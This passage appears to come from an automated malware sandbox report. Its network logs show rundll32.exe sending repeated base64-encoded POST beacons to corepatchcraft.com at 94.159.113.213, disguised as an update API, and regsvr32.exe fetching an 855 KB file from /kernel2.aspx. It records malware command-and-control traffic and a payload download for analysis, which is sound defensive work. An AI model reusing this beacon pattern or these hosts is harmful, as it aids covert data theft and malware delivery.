                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        73 | 192.168.2.6 | 64452 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:35 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:35 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:35 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        74 | 192.168.2.6 | 64453 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:36 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:36 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:36 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        75 | 192.168.2.6 | 64454 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:37 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:38 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:38 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        76 | 192.168.2.6 | 64455 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:39 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:39 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:39 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        77 | 192.168.2.6 | 64456 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:40 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:41 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:40 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        78 | 192.168.2.6 | 64457 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:42 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:42 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:42 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        79 | 192.168.2.6 | 64458 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:43 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:43 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:43 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:43 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        80 | 192.168.2.6 | 64459 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:44 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:44 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:45 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:45 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:45 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        81 | 192.168.2.6 | 64460 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:46 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:46 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:46 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:46 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:46 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        82 | 192.168.2.6 | 64461 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:47 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:47 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:48 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:47 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:48 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        83 | 192.168.2.6 | 64462 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:49 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:49 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:49 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:49 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:49 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        84 | 192.168.2.6 | 64463 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:50 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:50 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:50 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:50 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:50 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        85 | 192.168.2.6 | 64464 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:51 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:51 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:52 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:51 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:52 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        86 | 192.168.2.6 | 64465 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:53 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:53 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:53 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:53 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:53 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        87 | 192.168.2.6 | 64466 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:54 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:54 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:54 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:54 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:54 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        88 | 192.168.2.6 | 64467 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:55 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:55 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:56 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:56 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:56 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        89 | 192.168.2.6 | 64468 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:57 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:57 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:57 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:57 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:57 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        90 | 192.168.2.6 | 64469 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:58 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:58 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:58 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:58 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:58 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        91 | 192.168.2.6 | 64470 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:03:59 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:59 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:04:00 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:04:00 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:04:00 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        92 | 192.168.2.6 | 64471 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:04:01 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:04:01 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:04:01 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:04:01 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:04:01 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        93 | 192.168.2.6 | 64473 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:04:02 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:04:03 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:04:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:04:03 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        94 | 192.168.2.6 | 64474 | 94.159.113.213 | 443 | 5688 | C:\Windows\SysWOW64\regsvr32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:04:03 UTC | 81 | OUT | GET /kernel2.aspx HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:04:03 UTC | 252 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:04:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
                        ETag: "d0d40-62b59bbb4c5fe"
                        Accept-Ranges: bytes
                        Content-Length: 855360
                        Connection: close


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        95 | 192.168.2.6 | 64475 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:04:04 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:04:04 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:04:04 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:04:04 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=



                        Target ID:0
                        Start time:00:01:56
                        Start date:16/01/2025
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
